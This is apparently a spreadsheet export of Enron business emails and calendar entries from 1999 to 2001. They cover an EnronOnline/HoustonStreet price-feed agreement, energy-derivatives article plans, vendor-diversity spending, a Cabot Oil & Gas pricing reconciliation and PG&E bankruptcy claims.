From: Louise.Kitchen@enron.com [mailto:Louise.Kitchen@enron.com]_x000D_
Sent: Tuesday, May 16, 2000 7:19 AM_x000D_
To: Louise.Kitchen@enron.com_x000D_
Cc: fgetman@houstonstreet.com; mark.taylor@enron.com;_x000D_
dave.samuels@enron.com; Andy.Zipper@enron.com_x000D_
Subject: Re: Follow-up on Friday's meeting_x000D_
_x000D_
_x000D_
_x000D_
Also Frank I think you'll have to provide a lot of the corporation/equity_x000D_
documentation._x000D_
_x000D_
Thanks_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
05/16/2000 06:09 AM_x000D_
_x000D_
To:   "Frank Getman, HSE" &lt;fgetman@houstonstreet.com&gt; @ ENRON_x000D_
cc:   "'mark.taylor@enron.com'" &lt;mark.taylor@enron.com&gt;@ENRON,_x000D_
      "'dave.samuels@enron.com'" &lt;dave.samuels@enron.com&gt;@ENRON, Andy_x000D_
      Zipper/Corp/Enron@Enron_x000D_
_x000D_
Subject:  Re: Follow-up on Friday's meeting  (Document link: Louise_x000D_
      Kitchen)_x000D_
_x000D_
I spoke to Mark yesterday and he is moving as fast as possible - it may be_x000D_
a good idea to start with a detailed term sheet  whilst the fuller document_x000D_
is in drafting (we will be using external counsel to speed things up)._x000D_
_x000D_
I looked at your list of products (sent by Kevin) which is a great deal_x000D_
wider than those we quote.  I think the best qay to proceed would be with a_x000D_
manageable list from which we build as soon as both parties are happy with_x000D_
the technology._x000D_
I have attached a draft list below (natual gas an power only so far), the_x000D_
terms would be dependent of their availability.  When do you plan to_x000D_
introduce financial transactions?_x000D_
_x000D_
(See attached file: product list.doc)_x000D_
_x000D_
Due to the time difference this week - the easiest way of contacting me is_x000D_
email.  I would also suggest we think about setting up a meeting for early_x000D_
next week to go through the draft._x000D_
_x000D_
Regards_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 (Embedded     Enron Capital &amp; Trade Resources Corp._x000D_
 image moved_x000D_
 to file:      From:  "Frank Getman, HSE"_x000D_
 pic04304.pcx) &lt;fgetman@houstonstreet.com&gt;_x000D_
               05/15/2000 11:19 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   "'mark.taylor@enron.com'" &lt;mark.taylor@enron.com&gt;_x000D_
cc:   "'dave.samuels@enron.com'" &lt;dave.samuels@enron.com&gt;, "Louise Kitchen_x000D_
      (E-mail)" &lt;lkitchen@enron.com&gt;_x000D_
_x000D_
Subject:  Follow-up on Friday's meeting_x000D_
_x000D_
_x000D_
Hi Mark,_x000D_
_x000D_
Thanks for taking time on Friday to participate in our meeting.  I think we_x000D_
made good progress -- by the end of the day, Louise and I were able to_x000D_
resolve most, if not all, major items.  Late on Friday, Kevin Sluder from_x000D_
my_x000D_
office forwarded to Louise by email a list of the proposed markets on_x000D_
HoustonStreet for which we would look to receive prices electronically from_x000D_
EnronOnline.  Louise indicated that you would attempt to have a draft_x000D_
agreement available late in the day on Monday or Tuesday morning.  I wanted_x000D_
to confirm this timing so I can make sure I have the appropriate_x000D_
individuals_x000D_
on my end ready to turn it around.  I think it is in everyone's interest to_x000D_
try to push this forward this week._x000D_
_x000D_
Please let me know if you need any additional information from_x000D_
HoustonStreet._x000D_
_x000D_
Best regards,_x000D_
Frank Getman_x000D_
fgetman@houstonstreet.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 May 2000 10:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: Book and EPRM articles</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 05/25/2000 _x000D_
05:47 PM ---------------------------_x000D_
_x000D_
_x000D_
VKaminski@aol.com on 05/14/2000 08:03:36 PM_x000D_
To: vkamins@enron.com_x000D_
cc:  _x000D_
Subject: Fwd: Book and EPRM articles_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Content-transfer-encoding: quoted-printable_x000D_
Return-Path: &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
Received: from  rly-za05.mx.aol.com (rly-za05.mail.aol.com [172.31.36.101]) _x000D_
by air-za03.mail.aol.com (v70.20) with ESMTP; Fri, 21 Apr 2000 17:48:23 -0400_x000D_
Received: from  postmaster.enron.com (outbound5.enron.com [192.152.140.9]) by _x000D_
rly-za05.mx.aol.com (v71.10) with ESMTP; Fri, 21 Apr 2000 17:48:03 -0400_x000D_
Received: from mailman.enron.com (mailman.enron.com [192.168.189.66]) by _x000D_
postmaster.enron.com (8.8.8/8.8.8/postmaster-1.00) with ESMTP id QAA14355 for _x000D_
&lt;vkaminski@aol.com&gt;; Fri, 21 Apr 2000 16:48:02 -0500 (CDT)_x000D_
Received: from dserv1.ect.enron.com (dserv1.ect.enron.com [172.16.1.37]) by _x000D_
mailman.enron.com (8.8.8/8.8.8/corp-1.03) with ESMTP id QAA06854 for _x000D_
&lt;vkaminski@aol.com&gt;; Fri, 21 Apr 2000 16:47:59 -0500 (CDT)_x000D_
Received: from notes.ect.enron.com (ecthou_gt2.corp.enron.com [172.16.4.33]) _x000D_
by dserv1.ect.enron.com (8.8.8/8.8.8) with SMTP id QAA19444 for _x000D_
&lt;vkaminski@aol.com&gt;; Fri, 21 Apr 2000 16:48:02 -0500 (CDT)_x000D_
Received: by notes.ect.enron.com(Lotus SMTP MTA v4.6.5  (863.2 5-20-1999))  _x000D_
id 862568C8.0077C120 ; Fri, 21 Apr 2000 16:48:02 -0500_x000D_
X-Lotus-FromDomain: ECT_x000D_
From: "Vince J Kaminski" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
To: vkaminski@aol.com_x000D_
Message-ID: &lt;862568C8.0077BFB4.00@notes.ect.enron.com&gt;_x000D_
Date: Fri, 21 Apr 2000 16:47:55 -0500_x000D_
Subject: Book and EPRM articles_x000D_
Mime-Version: 1.0_x000D_
Content-type: text/plain; charset=iso-8859-1_x000D_
Content-Disposition: inline_x000D_
X-Mailer: Unknown_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/21/2000 _x000D_
04:49_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Chris Strickland" &lt;chris@lacima.co.uk&gt; on 04/20/2000 04:32:32 AM_x000D_
_x000D_
Please respond to "Chris Strickland" &lt;chris@lacima.co.uk&gt;_x000D_
_x000D_
To:   "VinceJKaminski" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:   "Julie" &lt;julie@lacima.co.uk&gt;_x000D_
Subject:  Book and EPRM articles_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hi Vince,_x000D_
_x000D_
I was wondering how the chapter of the book is coming along??! Do you want  me_x000D_
to make 'noise' tomorrow or to leave you until after Easter?_x000D_
_x000D_
Until then, I wanted to discuss with you an idea  that Les and I have been_x000D_
throwing around concerning writing a series of articles  for Risk's 'Energy _x000D_
and_x000D_
Power Risk Management'. We would like to propose to  them?that we would write _x000D_
an_x000D_
article a month, covering practical issues  dealing with energy modelling and_x000D_
energy derivative pricing and risk management.  The articles would be based _x000D_
upon_x000D_
sections of the book so as to promote the book,  and to reduce the effort/time_x000D_
involved by using?already produced material.  We would like to cover some very_x000D_
practical topics, but we?won't be giving  too much away as the articles are _x000D_
only_x000D_
1 or 2 pages long._x000D_
_x000D_
Each article would be of?the  form;_x000D_
_x000D_
- introduce?the concept_x000D_
- give an example using real data_x000D_
- discuss the problem with a case study_x000D_
- provide a discussion_x000D_
- sum up_x000D_
_x000D_
I've included a list of potential articles at the  end of this e-mail. For_x000D_
example, for the first one,  "Estimation of mean reversion in spot energy_x000D_
prices", we would introduce  the concept of mean reversion,?show a graph of an_x000D_
equity index and an  energy price?for illustration of our point, estimate the_x000D_
parameter for a  series of energies over a number of seasons, and finally,_x000D_
discuss the  results._x000D_
_x000D_
We?are wondering if you would like to be  involved in this project? Your_x000D_
involvement needn't take much time (although it  is up to you). The kind of_x000D_
input we are hoping for (again, this is up to you) is  that you?would?review _x000D_
the_x000D_
list of articles and  provide?suggestions of additions or deletions, suggest_x000D_
reasonable data sets  or case studies to work with on each article, and then _x000D_
to_x000D_
run your eye over  "near finished" articles, which?we would supply to you for_x000D_
your?practical experience?input.? Would something like this  interest you? If _x000D_
it_x000D_
did, we would try to sell Risk on making it a regular  monthly "feature" of_x000D_
EPRM, authored by all three of us._x000D_
_x000D_
We are hoping to present our proposal to Risk in  the next few weeks, so _x000D_
please_x000D_
let us know if you are interested._x000D_
_x000D_
Best regards._x000D_
_x000D_
Chris._x000D_
_x000D_
_x000D_
Potental EPRM articles;_x000D_
_x000D_
1- Estimation of mean reversion in spot energy  prices (with parameters_x000D_
estimated for oil, gas, and electricity data over  different seasons)_x000D_
_x000D_
2- Estimation of jumps in spot energy prices (with  parameters estimated for_x000D_
oil, gas, and electricity data over different  seasons)_x000D_
_x000D_
3- Simulating a mean reverting spot price process  for pricing energy_x000D_
derivatives (with case study applied to an Asian option on  oil)_x000D_
_x000D_
4- Simulating a jump / diffusion spot price process  for pricing energy_x000D_
derivatives (with case study applied to a Swaption on natural  gas)_x000D_
_x000D_
5- Simulating a mean reverting jump / diffusion  spot price process for _x000D_
pricing_x000D_
energy derivatives (with case study applied to  hourly caps on spot _x000D_
electricity)_x000D_
_x000D_
6- An analytical pricing formula for pricing caps  in a mean reverting spot_x000D_
price model (with example applied to a cap on natural  gas fitting the Forward_x000D_
curve and volatlity structure)_x000D_
_x000D_
7- using a tree consistent with the forward curve  and vols for pricing swing_x000D_
options_x000D_
_x000D_
8- implying a single?factor vol function from  market Futures option prices _x000D_
and_x000D_
variation of parameters thru time_x000D_
_x000D_
9- adding jump volatility to the tree_x000D_
_x000D_
10- An analytical pricing formula for pricing caps  in a multi-factor forward_x000D_
curve model(with example applied to the same cap on  natural gas and a_x000D_
discussion on the differences between the two  approaches)_x000D_
_x000D_
11- Estimating volatility functions for  multi-factor forward curve models _x000D_
(with_x000D_
estimates of oil data over different  periods)_x000D_
_x000D_
12- Estimating volatility functions for  multi-factor forward curve model from_x000D_
market option prices_x000D_
_x000D_
13- pricing swing option in multi factor model  using tree for exercise _x000D_
strategy_x000D_
_x000D_
14- comparison of VaR methodoligies applied to the  same energy derivativ_x000D_
portfolio._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 09:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'karina.prizont@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'jeffrey.mcmahon@enron.com', 'andrew.fastow@enron.com', 'elizabeth.tilney@enron.com', 'richard.causey@enron.com', 'steven.kean@enron.com', 'larry.izzo@enron.com'})</t>
  </si>
  <si>
    <t>Expenditures with Minority/Women Owned Business Enterprises through_x000D_
 June 30, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Karina Prizont/NA/Enron on 08/28/2000 04:10 PM -----_x000D_
_x000D_
	George Wasaff_x000D_
	08/28/2000 12:23 PM_x000D_
		 _x000D_
		 To: Kenneth Lay/Corp/Enron@ENRON, Jeffrey Skilling, Joseph W _x000D_
Sutton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, jbannan@enron.com, Cliff _x000D_
Baxter/HOU/ECT@ECT, Sanjay Bhatnagar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Rick Buy/HOU/ECT@ECT, Rick Causey, Diomedes Christodoulou/SA/Enron@Enron, _x000D_
Stephanie Harris@ENRON, Andy Fastow, Calvin Eakins/Corp/Enron@ENRON, Mark _x000D_
Frevert/NA/Enron@Enron, Kevin Hannon/Enron Communications@Enron _x000D_
Communications, David W Delainey/HOU/ECT@ECT, David _x000D_
Haug/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Stanley Horton/Corp/Enron@Enron, _x000D_
Lawrence Izzo, Steve Kean, Mike McConnell/HOU/ECT@ECT, Rebecca _x000D_
McDonald/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jeff McMahon, Cindy _x000D_
Olson/Corp/Enron@ENRON, Karen S Owens@ees@EES, Ken Rice/Enron _x000D_
Communications@Enron Communications, Jeffrey Sherrick/Corp/Enron@ENRON, John _x000D_
Sherriff/LON/ECT@ECT, Beth  Tilney, Greg Whalley/HOU/ECT@ECT, Thomas E _x000D_
White/HOU/EES@EES, John Garrison/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, J Mark _x000D_
Metts/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Expenditures with Minority/Women Owned Business Enterprises through _x000D_
June 30, 2000_x000D_
_x000D_
Ladies and Gentlemen:_x000D_
_x000D_
Set forth below for your information and review are the expenditures with _x000D_
Minority/Women Owned Business Enterprises through June 30, 2000._x000D_
_x000D_
As you can see, Enron's spend through mid-year 2000 is below the trend _x000D_
necessary to achieve the targeted 15% that was committed for the year.  In an _x000D_
effort to assist you in achieving your unit's objectives, Calvin Eakins and I _x000D_
will schedule business reviews over the next two weeks to share strategies _x000D_
for increasing opportunities for M/WBE's to provide goods and services to _x000D_
Enron._x000D_
_x000D_
Thanks in advance for making time available on your schedule,_x000D_
_x000D_
George Wasaff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Jan 2000 04:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'melissa.graves@enron.com'})</t>
  </si>
  <si>
    <t>Re: Cabot Oil &amp; Gas Marketing Corp. - 9/99 production - price</t>
  </si>
  <si>
    <t xml:space="preserve">June-August were incorrect in Sitara.  I have made the necessary _x000D_
adjustments.  Stephanie will have to reissue payments.  By my calculations, _x000D_
Cabot owes HPL $16,050._x000D_
See Below_x000D_
_x000D_
Month  Volume/d Rate was Rate Should Be   Economics_x000D_
6/99    5000     $2.09      $2.20      $ (16,500)     This Should be Sharp's _x000D_
expense as this was pre-merger._x000D_
7/99    5000     $2.14      $2.20      $ (9,300)        This Should be the _x000D_
desk's_x000D_
8/99           5000     $2.47      $2.20      $ 41,850         This Should be _x000D_
the desk's_x000D_
                                         $ 16,050_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Melissa Graves                           01/26/2000 03:04 PM_x000D_
	_x000D_
_x000D_
To: Stephanie Gomes/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Cabot Oil &amp; Gas Marketing Corp. - 9/99 production - price  _x000D_
_x000D_
Eric, _x000D_
_x000D_
Why would this ticket only affect Sept. and not the other months?_x000D_
_x000D_
Melissa_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Stephanie Gomes                           01/26/2000 02:47 PM_x000D_
	_x000D_
_x000D_
To: Melissa Graves/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Cabot Oil &amp; Gas Marketing Corp. - 9/99 production - price  _x000D_
_x000D_
I am only showing a price adjustment for 9/99.  No adjustments for June- _x000D_
August occurred._x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Melissa Graves                           01/26/2000 01:43 PM_x000D_
	_x000D_
_x000D_
To: Stephanie Gomes/HOU/ECT@ECT_x000D_
cc: Eric Bass/HOU/ECT@ECT _x000D_
Subject: Re: Cabot Oil &amp; Gas Marketing Corp. - 9/99 production - price_x000D_
_x000D_
Stephanie, _x000D_
_x000D_
The deal ticket that Eric mentions below that changed the tiered pricing is _x000D_
EW5406.1 (which fixes the price to $2.35 from 6/1/99-9/30/99)._x000D_
_x000D_
I was wondering if you showed price adjustments to June-August, in addition _x000D_
to September (since this ticket affects all months). _x000D_
_x000D_
Let me know, and then I'll call Laurie Clarkson with Cabot Oil &amp; Gas and ask _x000D_
her to run this past her trader (Kent Beard) and make sure we are all on the _x000D_
same page._x000D_
_x000D_
Thanks, _x000D_
Melissa  _x000D_
---------------------- Forwarded by Melissa Graves/HOU/ECT on 01/26/2000 _x000D_
01:12 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Bass                           01/26/2000 11:46 AM_x000D_
	_x000D_
_x000D_
To: Melissa Graves/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Cabot Oil &amp; Gas Marketing Corp. - 9/99 production - price  _x000D_
_x000D_
I show five fixed for float swaps done for September Production.  The deal _x000D_
numbers and prices follow:_x000D_
_x000D_
   Deal #                 Vol         Swap Px           Resulting Customer Px_x000D_
ES5823.20        5,000/d        $2.21                          $2.10_x000D_
ES5823.21        5,000/d        $2.21                          $2.10_x000D_
ES5823.30        10,000/d      $2.7475                     $2.5975_x000D_
EW2883.1         10,000/d       $2.265                       $2.155_x000D_
EW5406.1          5,000/d       $2.35                          _x000D_
$2.15                          _x000D_
_x000D_
_x000D_
Let me know if this clears everything up._x000D_
_x000D_
Eric_x000D_
x3-0977_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Melissa Graves                           01/26/2000 11:17 AM_x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc: Stephanie Gomes/HOU/ECT@ECT, Julie Meyers/HOU/ECT@ECT _x000D_
Subject: Re: Cabot Oil &amp; Gas Marketing Corp. - 9/99 production - price_x000D_
_x000D_
Eric, _x000D_
_x000D_
Can you please help per Stephanie's note below.  The audit record shows that _x000D_
you changed the tiered pricing on this Cabot deal for 9/99.  Both Stephanie _x000D_
and myself thought that Cabot and HPL were in agreement on these prices for _x000D_
September.  Can you provide insight into why the tiers were changed for this _x000D_
month?_x000D_
_x000D_
Thank you,_x000D_
Melissa_x000D_
---------------------- Forwarded by Melissa Graves/HOU/ECT on 01/26/2000 _x000D_
11:14 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Stephanie Gomes                           01/26/2000 10:43 AM_x000D_
	_x000D_
_x000D_
To: Melissa Graves/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Cabot Oil &amp; Gas Marketing Corp. - 9/99 production - price  _x000D_
_x000D_
Melissa, _x000D_
_x000D_
Someone has changed one of the price tiers on Cabot for 9/99 production.  Due _x000D_
to the price change, it is now showing that I need to take a credit of $ _x000D_
52,996.72 from Cabot.  Is this correct or not????  I thought we had figured _x000D_
the pricing out for 9/99 and Cabot had also agreed.  Please let me know if _x000D_
the price change is correct or not, and if I need to take this credit from _x000D_
Cabot.  See below the change that was made in Sitara and I am also showing _x000D_
what we paid versus what is now showing up in the system._x000D_
_x000D_
Original payment ( per your email below )_x000D_
_x000D_
_x000D_
          0  -  10,000  $2.1000_x000D_
10,001  -  20,000  $2.1550_x000D_
20,001  -  30,000  $2.5975_x000D_
30,001  +  $2.7100_x000D_
_x000D_
_x000D_
Change that has been made in system_x000D_
_x000D_
          0  -  10,000  $2.1000_x000D_
10,001  -  20,000  $2.1550_x000D_
20,001  -  30,000  $2.5975_x000D_
30,001  -  35,000  $2.1500_x000D_
35,001  -  50,000  $2.7100_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Melissa Graves                           11/01/99 02:28 PM_x000D_
	_x000D_
_x000D_
To: Shawna Flynn/HOU/ECT@ECT, Stephanie Gomes/HOU/ECT@ECT_x000D_
cc: Jill T Zivley/HOU/ECT@ECT, Janelle Scheuer/HOU/ECT@ECT _x000D_
Subject: Cabot Oil &amp; Gas Marketing Corp. - Amendment and Confirmations to _x000D_
Contract dated 12/1/98_x000D_
_x000D_
Shawna, _x000D_
_x000D_
Per my voice mail, please add the following confirmations in addition to the _x000D_
items you are sending to Cabot:_x000D_
_x000D_
 Period of Delivery:  September 1999_x000D_
 Price:    $2.7475_x000D_
 Flexible Pricing Volume:  10,000/d_x000D_
 Date Agreed:   8/9/99_x000D_
_x000D_
 Period of Delivery:  November 1999_x000D_
 Price:    $2.925_x000D_
 Flexible Pricing Volume:  5,000/d_x000D_
 Date Agreed:   10/13/99_x000D_
_x000D_
 Period of Delivery:  November 1999_x000D_
 Price:    $2.9325_x000D_
 Flexible Pricing Volume:  10,000/d_x000D_
 Date Agreed:   10/13/99_x000D_
_x000D_
 Period of Delivery:  November 1999 _x000D_
 Price:    $2.935_x000D_
 Flexible Pricing Volume:  10,000/d_x000D_
 Date Agreed:   10/20/99_x000D_
_x000D_
Stephanie, _x000D_
_x000D_
Below, please find the revised pricing matrix.  Please adjust Sitara and pay _x000D_
Cabot accordingly:_x000D_
_x000D_
_x000D_
SEPTEMBER:_x000D_
0 - 10,000 HSC fixed at $2.21 $2.21-$0.11= $2.10  Have deal ticket_x000D_
10,001 - 20,000 HSC fixed at $2.10 $2.265-$0.11= $2.155  Per deal ticket, _x000D_
requested copy_x000D_
20,001 - 30,000 HSC fixed at $2.7475 $2.7475-$0.15= $2.5975  Per deal ticket, _x000D_
requested copy_x000D_
30,001+      $2.91-$0.20= $2.71  Per original contract_x000D_
_x000D_
NOVEMBER:_x000D_
0 - 5,000 HSC fixed at $2.925 $2.925-$0.11= $2.815  Per deal ticket, _x000D_
requested copy_x000D_
5,001 - 15,000 HSC fixed at $2.9325 $2.9325-$0.11= $2.8225  Per deal ticket, _x000D_
requested copy_x000D_
15,001 - 20,000 HSC fixed at $2.935 $2.935-$0.11= $2.825  Per deal ticket, _x000D_
requested copy_x000D_
20,001   -  25,000 HSC fixed at $2.935 $2.935-$0.15= $2.785  Per deal ticket, _x000D_
requested copy_x000D_
25,001 - 30,000    $HSC -$0.15= $PRICE  Per original contract_x000D_
30,001+      $HSC-$0.20= $PRICE  Per original contract_x000D_
_x000D_
Thank you, _x000D_
Melissa Graves_x000D_
X39173_x000D_
---------------------- Forwarded by Melissa Graves/HOU/ECT on 11/01/99 02:15 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Melissa Graves                           10/18/99 11:16 AM_x000D_
	_x000D_
_x000D_
To: Shawna Flynn/HOU/ECT@ECT, Stephanie Gomes/HOU/ECT@ECT_x000D_
cc: Jill T Zivley/HOU/ECT@ECT, Janelle Scheuer/HOU/ECT@ECT _x000D_
Subject: Cabot Oil &amp; Gas Marketing Corp. - Amendment and Confirmations to _x000D_
Contract dated 12/1/98_x000D_
_x000D_
Shawna, _x000D_
_x000D_
Per my voice mail, please send the amendment to the above referenced _x000D_
contract, to allow for Flexible Pricing transactions.  (Jill Zivley has _x000D_
reviewed and approved the draft amendment.)  Please also attach confirmations _x000D_
with the following details regarding Flexible Pricing deals that have been _x000D_
done with Cabot Oil &amp; Gas Marketing Corp.:_x000D_
_x000D_
 _x000D_
 Period of Delivery:  May 1999_x000D_
 Price:    $2.035_x000D_
 Flexible Pricing Volume:  10,000/d_x000D_
 Date Agreed:   3/7/99_x000D_
_x000D_
 Period of Delivery:  Jun 1999 - Aug 1999_x000D_
 Price:    $2.10_x000D_
 Flexible Pricing Volume:  5,000/d_x000D_
 Date Agreed:   4/8/99_x000D_
_x000D_
 Period of Delivery:  Jun 1999 - Aug 1999_x000D_
 Price:    $2.05_x000D_
 Flexible Pricing Volume:  5,000/d_x000D_
 Date Agreed:   4/7/99_x000D_
_x000D_
 Period of Delivery:  Jun 1999 - Sept 1999_x000D_
 Price:    $2.21_x000D_
 Flexible Pricing Volume:  10,000/d_x000D_
 Date Agreed:   5/12/99_x000D_
_x000D_
 Period of Delivery:  Sept 1999_x000D_
 Price:    $2.265_x000D_
 Flexible Pricing Volume:  10,000/d_x000D_
 Date Agreed:   4/22/99_x000D_
_x000D_
 Period of Delivery:  Oct 1999_x000D_
 Price:    $2.565_x000D_
 Flexible Pricing Volume:  15,000/d_x000D_
 Date Agreed:   7/26/99_x000D_
_x000D_
The address for Cabot is: _x000D_
_x000D_
Cabot Oil &amp; Gas Marketing Corporation_x000D_
P. O. Box 4544_x000D_
Houston, Texas  77210_x000D_
_x000D_
_x000D_
Stephanie, _x000D_
_x000D_
Below, please find the revised pricing matrix.  Please adjust Sitara and pay _x000D_
Cabot accordingly:_x000D_
_x000D_
MAY:_x000D_
0 - 10,000 HSC fixed at $2.035 $2.035-$0.11= $1.925  Have deal ticket_x000D_
10,001 - 20,000    $2.35 - $0.11= $2.24   Per original contract_x000D_
20,001  - 30,000    $2.35 - $0.15= $2.20  Per original contract   _x000D_
30,001+      $2.35 - $0.20= $2.15  Per original contract_x000D_
_x000D_
JUNE AND JULY AND AUGUST (same for both months):_x000D_
0 - 5,000 HSC fixed at $2.05 $2.05-$0.11= $1.94  Have deal ticket_x000D_
5,001 - 10,000 HSC fixed at $2.10 $2.10-$0.11= $1.99  Have deal ticket_x000D_
10,001 - 20,000 HSC fixed at $2.21 $2.21-$0.11= $2.10  Have deal ticket_x000D_
20,001 - 30,000    $2.24-$0.15= $2.09 June Per original contract_x000D_
      $2.29-$0.15= $2.14 July Per original contract_x000D_
      $2.62-$0.15= $2.47 August Per original contract_x000D_
30,001+      $2.24-$0.20= $2.04 June Per original contract_x000D_
      $2.29-$0.20= $2.09 July Per original contract_x000D_
      $2.62-$0.20= $2.42 August Per original contract_x000D_
SEPTEMBER:_x000D_
0 - 10,000 HSC fixed at $2.21 $2.21-$0.11= $2.10  Have deal ticket_x000D_
10,001 - 20,000 HSC fixed at $2.10 $2.265-$0.11= $2.155  Per deal ticket, _x000D_
requested copy_x000D_
20,001 - 30,000    $2.91-$0.15= $2.76  Per original contract_x000D_
30,001+      $2.91-$0.20= $2.71  Per original contract_x000D_
_x000D_
OCTOBER:_x000D_
0 - 15,000 HSC fixed at $2.565 $2.565-$0.11= $2.455  Per deal ticket, _x000D_
requested copy_x000D_
15,001 - 20,000    $2.54-$0.11= $2.43  Per original contract_x000D_
20,001 - 30,000    $2.54-$0.15= $2.39  Per original contract_x000D_
30,001+      $2.54-$0.20= $2.34  Per original contract_x000D_
_x000D_
_x000D_
Thank you, _x000D_
Melissa Graves_x000D_
X39173_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Terry K. - Oncall</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Terry K. - Oncall_x000D_
_x000D_
Date:		10/20/2001_x000D_
Time:		7:00 AM - 8:00 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 06:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Meet w/MEHaedicke, E. Sager, V. Sharp re:  Califorinia, exposures,_x000D_
 triangular setoffs, etc. EB3325</t>
  </si>
  <si>
    <t>Mary Cook has a conflict (Bank conference call) and has asked you to attend _x000D_
in her steed.  She will join the group once her call is completed.</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 10:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: PX credits &amp; Schedule F in the PG&amp;E bankruptcy</t>
  </si>
  <si>
    <t xml:space="preserve">Bob:_x000D_
_x000D_
_x000D_
Bill Bradford and I have a phone call with PG&amp;E at noon tomorrow.   We will _x000D_
advise everyone of what we learn._x000D_
_x000D_
_x000D_
Michael_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Williams, Robert C.  _x000D_
Sent: Wednesday, May 23, 2001 5:33 PM_x000D_
To: Tribolet, Michael; Buy, Rick; Gorte, David; Bradford, William S.; Kean, _x000D_
Steven; Shapiro, Richard; Steffes, James; Kingerski, Harry; Koenig, Mark; _x000D_
Palmer, Mark; Denne, Karen; Haedicke, Mark; Mellencamp, Lisa; Sager, _x000D_
Elizabeth; McCullough, Travis; Sharp, Vicki; Smith, Mike; Curry, Wanda; _x000D_
Dasovich, Jeff; Mara, Susan; 'byoung@llgm.com'; 'jklauber@llgm.com'; Whalley, _x000D_
Greg; Lavorato, John; Delainey, David; Dietrich, Janet; Sunde, Marty; Leff, _x000D_
Dan_x000D_
Subject: RE: PX credits &amp; Schedule F in the PG&amp;E bankruptcy_x000D_
_x000D_
Michael, how can we get with PG&amp;E to determine where the discrepancy lies?_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Tribolet, Michael  _x000D_
Sent: Wednesday, May 23, 2001 3:02 PM_x000D_
To: Buy, Rick; Gorte, David; Bradford, William S.; Kean, Steven; Shapiro, _x000D_
Richard; Steffes, James; Kingerski, Harry; Koenig, Mark; Palmer, Mark; Denne, _x000D_
Karen; Haedicke, Mark; Mellencamp, Lisa; Sager, Elizabeth; McCullough, _x000D_
Travis; Sharp, Vicki; Smith, Mike; Williams, Robert C.; Curry, Wanda; _x000D_
Dasovich, Jeff; Mara, Susan; 'byoung@llgm.com'; 'jklauber@llgm.com'; Whalley, _x000D_
Greg; Lavorato, John; Delainey, David; Dietrich, Janet; Sunde, Marty; Leff, _x000D_
Dan_x000D_
Subject: PX credits &amp; Schedule F in the PG&amp;E bankruptcy_x000D_
_x000D_
PG&amp;E filed their Schedule F which displays its nonpriority unsecured claims.  _x000D_
Many of the claims were listed as unknown in amount.  The PX credit amounts _x000D_
were listed as disputed.   Two PX credit amounts were specified in the _x000D_
Schedule F:_x000D_
_x000D_
Enron Energy Marketing      $201,964,905.64_x000D_
